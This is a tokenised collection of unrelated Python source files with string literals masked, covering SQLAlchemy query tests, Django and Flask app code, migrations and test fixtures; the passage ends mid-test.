def _names_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_names_overlap_nolabel ( self ) : <EOL> sel = self . _names_overlap ( ) <EOL> self . _assert_labels_warning ( sel ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:x>' ] ) <EOL> def test_names_overlap_label ( self ) : <EOL> sel = self . _names_overlap ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _names_overlap_keys_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT:b>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_names_overlap_keys_dont_nolabel ( self ) : <EOL> sel = self . _names_overlap_keys_dont ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:x>' ] ) <EOL> def test_names_overlap_keys_dont_label ( self ) : <EOL> sel = self . _names_overlap_keys_dont ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _labels_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_labels_overlap_nolabel ( self ) : <EOL> sel = self . _labels_overlap ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT:id>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_labels_overlap_label ( self ) : <EOL> sel = self . _labels_overlap ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , t2 . c . id . anon_label ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _labels_overlap_keylabels_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , key = '<STR_LIT:b>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_labels_overlap_keylabels_dont_nolabel ( self ) : <EOL> sel = self . _labels_overlap_keylabels_dont ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_labels_overlap_keylabels_dont_label ( self ) : <EOL> sel = self . _labels_overlap_keylabels_dont ( ) . apply_labels ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keylabels_overlap_labels_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT:a>' , Integer , key = '<STR_LIT>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:b>' , Integer , key = '<STR_LIT:id>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keylabels_overlap_labels_dont_nolabel ( self ) : <EOL> sel = self . _keylabels_overlap_labels_dont ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_keylabels_overlap_labels_dont_label ( self ) : <EOL> sel = self . _keylabels_overlap_labels_dont ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , t2 . c . id . anon_label ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keylabels_overlap_labels_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer , key = '<STR_LIT>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keylabels_overlap_labels_overlap_nolabel ( self ) : <EOL> sel = self . _keylabels_overlap_labels_overlap ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT:a>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_keylabels_overlap_labels_overlap_label ( self ) : <EOL> sel = self . _keylabels_overlap_labels_overlap ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , t2 . c . a . anon_label ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keys_overlap_names_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:a>' , Integer , key = '<STR_LIT:x>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:b>' , Integer , key = '<STR_LIT:x>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keys_overlap_names_dont_nolabel ( self ) : <EOL> sel = self . _keys_overlap_names_dont ( ) <EOL> self . _assert_labels_warning ( sel ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_keys_overlap_names_dont_label ( self ) : <EOL> sel = self . _keys_overlap_names_dont ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class ResultMapTest ( fixtures . TestBase ) : <EOL> def _fixture ( self ) : <EOL> m = MetaData ( ) <EOL> t = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT:x>' , Integer ) , Column ( '<STR_LIT:y>' , Integer ) ) <EOL> return t <EOL> def _mapping ( self , stmt ) : <EOL> compiled = stmt . compile ( ) <EOL> return dict ( <EOL> ( elem , key ) <EOL> for key , elements in compiled . _create_result_map ( ) . items ( ) <EOL> for elem in elements [ <NUM_LIT:1> ] <EOL> ) <EOL> def test_select_label_alt_name ( self ) : <EOL> t = self . _fixture ( ) <EOL> l1 , l2 = t . c . x . label ( '<STR_LIT:a>' ) , t . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert l1 in mapping <EOL> assert t . c . x not in mapping <EOL> def test_select_alias_label_alt_name ( self ) : <EOL> t = self . _fixture ( ) <EOL> l1 , l2 = t . c . x . label ( '<STR_LIT:a>' ) , t . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) . alias ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert l1 in mapping <EOL> assert t . c . x not in mapping <EOL> def test_select_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> s = select ( [ x , y ] ) . alias ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x in mapping <EOL> def test_select_alias_column_apply_labels ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> s = select ( [ x , y ] ) . apply_labels ( ) . alias ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x in mapping <EOL> def test_select_table_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> ta = t . alias ( ) <EOL> s = select ( [ ta . c . x , ta . c . y ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert x not in mapping <EOL> def test_select_label_alt_name_table_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> ta = t . alias ( ) <EOL> l1 , l2 = ta . c . x . label ( '<STR_LIT:a>' ) , ta . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert x not in mapping <EOL> assert l1 in mapping <EOL> assert ta . c . x not in mapping <EOL> def test_column_subquery_exists ( self ) : <EOL> t = self . _fixture ( ) <EOL> s = exists ( ) . where ( t . c . x == <NUM_LIT:5> ) . select ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x not in mapping <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists ( self ) : <EOL> expr = exists ( [ <NUM_LIT:1> ] ) <EOL> eq_ ( type ( expr . type ) , Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists_negate ( self ) : <EOL> expr = ~ exists ( [ <NUM_LIT:1> ] ) <EOL> eq_ ( type ( expr . type ) , Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists_double_negate ( self ) : <EOL> expr = ~ ( ~ exists ( [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( type ( expr . type ) , Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_column_subquery_plain ( self ) : <EOL> t = self . _fixture ( ) <EOL> s1 = select ( [ t . c . x ] ) . where ( t . c . x > <NUM_LIT:5> ) . as_scalar ( ) <EOL> s2 = select ( [ s1 ] ) <EOL> mapping = self . _mapping ( s2 ) <EOL> assert t . c . x not in mapping <EOL> assert s1 in mapping <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s2 . compile ( ) . _result_columns ] , <EOL> [ Integer ] <EOL> ) <EOL> def test_unary_boolean ( self ) : <EOL> s1 = select ( [ not_ ( True ) ] , use_labels = True ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s1 . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> class ForUpdateTest ( fixtures . TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = "<STR_LIT:default>" <EOL> def _assert_legacy ( self , leg , read = False , nowait = False ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s1 = select ( [ t ] , for_update = leg ) <EOL> if leg is False : <EOL> assert s1 . _for_update_arg is None <EOL> assert s1 . for_update is None <EOL> else : <EOL> eq_ ( <EOL> s1 . _for_update_arg . read , read <EOL> ) <EOL> eq_ ( <EOL> s1 . _for_update_arg . nowait , nowait <EOL> ) <EOL> eq_ ( s1 . for_update , leg ) <EOL> def test_false_legacy ( self ) : <EOL> self . _assert_legacy ( False ) <EOL> def test_plain_true_legacy ( self ) : <EOL> self . _assert_legacy ( True ) <EOL> def test_read_legacy ( self ) : <EOL> self . _assert_legacy ( "<STR_LIT>" , read = True ) <EOL> def test_nowait_legacy ( self ) : <EOL> self . _assert_legacy ( "<STR_LIT>" , nowait = True ) <EOL> def test_read_nowait_legacy ( self ) : <EOL> self . _assert_legacy ( "<STR_LIT>" , read = True , nowait = True ) <EOL> def test_legacy_setter ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) <EOL> s . for_update = '<STR_LIT>' <EOL> eq_ ( s . _for_update_arg . nowait , True ) <EOL> def test_basic_clone ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) . with_for_update ( read = True , of = t . c . c ) <EOL> s2 = visitors . ReplacingCloningVisitor ( ) . traverse ( s ) <EOL> assert s2 . _for_update_arg is not s . _for_update_arg <EOL> eq_ ( s2 . _for_update_arg . read , True ) <EOL> eq_ ( s2 . _for_update_arg . of , [ t . c . c ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" , <EOL> dialect = "<STR_LIT>" ) <EOL> def test_adapt ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) . with_for_update ( read = True , of = t . c . c ) <EOL> a = t . alias ( ) <EOL> s2 = sql_util . ClauseAdapter ( a ) . traverse ( s ) <EOL> eq_ ( s2 . _for_update_arg . of , [ a . c . c ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" , <EOL> dialect = "<STR_LIT>" ) </s>
<s> from weblayer . template import MakoTemplateRenderer <EOL> class Renderer ( MakoTemplateRenderer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = None <EOL> super ( Renderer , self ) . __init__ ( * args , ** kwargs ) </s>
<s> import inspect <EOL> from . patterns import * <EOL> class DecoratorBase ( object ) : <EOL> pattern = None <EOL> def __init__ ( self , functor ) : <EOL> self . _functor = functor <EOL> self . __doc__ = functor . __doc__ <EOL> self . __name__ = functor . __name__ <EOL> def __get__ ( self , instance , type_instance = None ) : <EOL> if instance is None : <EOL> return self <EOL> return self . __class__ ( self . _functor . __get__ ( instance , type_instance ) ) <EOL> def __call__ ( self , * args , ** kargs ) : <EOL> return self . _functor ( * args , ** kargs ) <EOL> def _zerorpc_doc ( self ) : <EOL> if self . __doc__ is None : <EOL> return None <EOL> return inspect . cleandoc ( self . __doc__ ) <EOL> def _zerorpc_args ( self ) : <EOL> try : <EOL> args_spec = self . _functor . _zerorpc_args ( ) <EOL> except AttributeError : <EOL> try : <EOL> args_spec = inspect . getargspec ( self . _functor ) <EOL> except TypeError : <EOL> try : <EOL> args_spec = inspect . getargspec ( self . _functor . __call__ ) <EOL> except ( AttributeError , TypeError ) : <EOL> args_spec = None <EOL> return args_spec <EOL> class rep ( DecoratorBase ) : <EOL> pattern = ReqRep ( ) <EOL> class stream ( DecoratorBase ) : <EOL> pattern = ReqStream ( ) </s>
<s> """<STR_LIT>""" <EOL> from django . test import TestCase <EOL> class HeaderTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def check_content_type_header ( self , response ) : <EOL> """<STR_LIT>""" <EOL> headers = response . _headers <EOL> actual = headers . get ( '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> self . assertEqual ( actual , expected ) <EOL> def check_security_headers ( self , response ) : <EOL> """<STR_LIT>""" <EOL> headers = response . _headers <EOL> actual = headers . get ( '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( actual , expected ) <EOL> actual = headers . get ( '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( actual , expected ) <EOL> actual = headers . get ( '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( actual , expected ) </s>
<s> from collections import Counter <EOL> from hippybot . decorators import botcmd <EOL> class Plugin ( object ) : <EOL> """<STR_LIT>""" <EOL> global_commands = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> command_aliases = { '<STR_LIT>' : '<STR_LIT>' } <EOL> counts = Counter ( ) <EOL> @ botcmd <EOL> def wave ( self , mess , args ) : <EOL> """<STR_LIT>""" <EOL> channel = unicode ( mess . getFrom ( ) ) . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> self . bot . log . info ( "<STR_LIT>" % self . counts [ channel ] ) <EOL> if not self . bot . from_bot ( mess ) : <EOL> self . counts [ channel ] += <NUM_LIT:1> <EOL> if self . counts [ channel ] == <NUM_LIT:3> : <EOL> self . counts [ channel ] = <NUM_LIT:0> <EOL> return r'<STR_LIT>' </s>
<s> from dateutil . relativedelta import relativedelta <EOL> from django . contrib . auth . models import User <EOL> from django . core . management . base import BaseCommand <EOL> from django . db . models import Count <EOL> from django . utils . timezone import now <EOL> class Command ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> help = "<STR_LIT>" <EOL> output_transaction = True <EOL> def handle ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> month = now ( ) - relativedelta ( months = <NUM_LIT:1> ) <EOL> users = list ( User . objects . annotate ( num_articles = Count ( '<STR_LIT>' ) ) . filter ( num_articles = <NUM_LIT:0> , last_login__lte = month ) ) <EOL> for user in users : <EOL> user . delete ( ) <EOL> self . stdout . write ( '<STR_LIT>' % user ) <EOL> self . stdout . write ( "<STR_LIT>" % len ( users ) ) </s>
<s> from django . shortcuts import render <EOL> from twobuntu . articles . models import Article <EOL> from twobuntu . categories . models import Category <EOL> from twobuntu . decorators import canonical <EOL> @ canonical ( Category ) <EOL> def view ( request , category ) : <EOL> """<STR_LIT>""" <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT:title>' : category . name , <EOL> '<STR_LIT>' : category , <EOL> '<STR_LIT>' : Article . objects . select_related ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) . filter ( category = category , status = Article . PUBLISHED ) , <EOL> } ) </s>
<s> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> from twobuntu . utils import uuid6 <EOL> @ python_2_unicode_compatible <EOL> class ShortURL ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> key = models . CharField ( <EOL> max_length = <NUM_LIT:6> , <EOL> primary_key = True , <EOL> default = uuid6 , <EOL> ) <EOL> url = models . URLField ( help_text = "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> return self . url </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from six import StringIO <EOL> from django import conf <EOL> from django . conf import LazySettings <EOL> _DJANGO_SETTINGS_MODULE = "<STR_LIT>" <EOL> os . environ [ '<STR_LIT>' ] = _DJANGO_SETTINGS_MODULE <EOL> class BaseDjangoTestCase ( object ) : <EOL> def setup ( self ) : <EOL> self . __reset_settings ( ) <EOL> def teardown ( self ) : <EOL> self . __reset_settings ( ) <EOL> @ staticmethod <EOL> def __reset_settings ( ) : <EOL> os . environ [ '<STR_LIT>' ] = _DJANGO_SETTINGS_MODULE <EOL> conf . settings = LazySettings ( ) <EOL> class MockApp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , status , headers ) : <EOL> self . status = status <EOL> self . headers = headers <EOL> def __call__ ( self , environ , start_response ) : <EOL> self . environ = environ <EOL> start_response ( self . status , self . headers ) <EOL> return [ "<STR_LIT:body>" ] <EOL> class MockGeneratorApp ( MockApp ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , environ , start_response ) : <EOL> self . environ = environ <EOL> start_response ( self . status , self . headers ) <EOL> def gen ( ) : <EOL> yield "<STR_LIT:body>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> return gen ( ) <EOL> class MockWriteApp ( MockApp ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , environ , start_response ) : <EOL> self . environ = environ <EOL> write = start_response ( self . status , self . headers ) <EOL> write ( "<STR_LIT:body>" ) <EOL> write ( "<STR_LIT>" ) <EOL> write ( "<STR_LIT>" ) <EOL> return [ ] <EOL> class MockClosingApp ( MockApp ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( MockClosingApp , self ) . __init__ ( * args , ** kwargs ) <EOL> self . app_iter = ClosingAppIter ( ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> body = super ( MockClosingApp , self ) . __call__ ( environ , start_response ) <EOL> self . app_iter . extend ( body ) <EOL> return self . app_iter <EOL> class ClosingAppIter ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ClosingAppIter , self ) . __init__ ( * args , ** kwargs ) <EOL> self . closed = False <EOL> def close ( self ) : <EOL> self . closed = True <EOL> def complete_environ ( ** environ ) : <EOL> """<STR_LIT>""" <EOL> full_environ = { <EOL> '<STR_LIT>' : "<STR_LIT:GET>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : StringIO ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : "<STR_LIT:http>" , <EOL> } <EOL> full_environ . update ( environ ) <EOL> return full_environ </s>
<s> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> HANDLER_CHOICES = ( <EOL> ( '<STR_LIT:count>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> def count ( data ) : <EOL> return len ( data ) <EOL> def cycletime ( data ) : <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> avg_cycle_time = <NUM_LIT:0> <EOL> for issue in data : <EOL> avg_cycle_time += issue . get_cycle_time ( ) . total_seconds ( ) <EOL> return int ( avg_cycle_time / len ( data ) ) <EOL> def leadtime ( data ) : <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> avg_lead_time = <NUM_LIT:0> <EOL> for issue in data : <EOL> avg_lead_time += issue . get_lead_time ( ) . total_seconds ( ) <EOL> return int ( avg_lead_time / len ( data ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import datetime <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . URLField ( default = None , null = True , blank = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateTimeField ( default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) , auto_now_add = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . TextField ( verbose_name = '<STR_LIT>' , default = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from setuptools import setup <EOL> from setuptools import find_packages <EOL> from os . path import join , dirname <EOL> import threebot as app <EOL> def long_description ( ) : <EOL> try : <EOL> return open ( join ( dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) <EOL> except IOError : <EOL> return "<STR_LIT>" <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = app . __version__ , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = "<STR_LIT>" , <EOL> maintainer_email = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = open ( '<STR_LIT>' ) . read ( ) . split ( '<STR_LIT:\n>' ) , <EOL> ) </s>
<s> import flask <EOL> import traceback <EOL> class ApiError ( Exception ) : <EOL> def __init__ ( self , status_code , * errors ) : <EOL> self . status_code = status_code <EOL> self . body = { <EOL> '<STR_LIT>' : errors <EOL> } <EOL> if flask . current_app . debug : <EOL> self . body [ '<STR_LIT>' ] = traceback . format_exc ( ) <EOL> def update ( self , additional ) : <EOL> for error in self . body [ '<STR_LIT>' ] : <EOL> error . update ( additional ) <EOL> return self </s>
<s> from flask_resty import Api , filter_function , Filtering , GenericModelView <EOL> from marshmallow import fields , Schema <EOL> import operator <EOL> import pytest <EOL> from sqlalchemy import Column , Integer , String <EOL> import helpers <EOL> @ pytest . yield_fixture <EOL> def models ( db ) : <EOL> class Widget ( db . Model ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> color = Column ( String ) <EOL> size = Column ( Integer ) <EOL> db . create_all ( ) <EOL> yield { <EOL> '<STR_LIT>' : Widget , <EOL> } <EOL> db . drop_all ( ) <EOL> @ pytest . fixture <EOL> def schemas ( ) : <EOL> class WidgetSchema ( Schema ) : <EOL> id = fields . Integer ( as_string = True ) <EOL> color = fields . String ( ) <EOL> size = fields . Integer ( ) <EOL> return { <EOL> '<STR_LIT>' : WidgetSchema ( ) , <EOL> } <EOL> @ pytest . fixture <EOL> def filter_fields ( ) : <EOL> @ filter_function ( fields . Boolean ( ) ) <EOL> def filter_size_is_odd ( model , value ) : <EOL> return model . size % <NUM_LIT:2> == int ( value ) <EOL> return { <EOL> '<STR_LIT>' : filter_size_is_odd <EOL> } <EOL> @ pytest . fixture ( autouse = True ) <EOL> def routes ( app , models , schemas , filter_fields ) : <EOL> class WidgetListView ( GenericModelView ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> schema = schemas [ '<STR_LIT>' ] <EOL> filtering = Filtering ( <EOL> color = operator . eq , <EOL> size_min = ( '<STR_LIT:size>' , operator . ge ) , <EOL> size_divides = ( '<STR_LIT:size>' , lambda size , value : size % value == <NUM_LIT:0> ) , <EOL> size_is_odd = filter_fields [ '<STR_LIT>' ] , <EOL> ) <EOL> def get ( self ) : <EOL> return self . list ( ) <EOL> api = Api ( app ) <EOL> api . add_resource ( '<STR_LIT>' , WidgetListView ) <EOL> @ pytest . fixture ( autouse = True ) <EOL> def data ( db , models ) : <EOL> db . session . add_all ( ( <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:1> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:2> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:3> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:6> ) , <EOL> ) ) <EOL> db . session . commit ( ) <EOL> def test_eq ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_eq_many ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:2> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> ] <EOL> def test_ge ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { 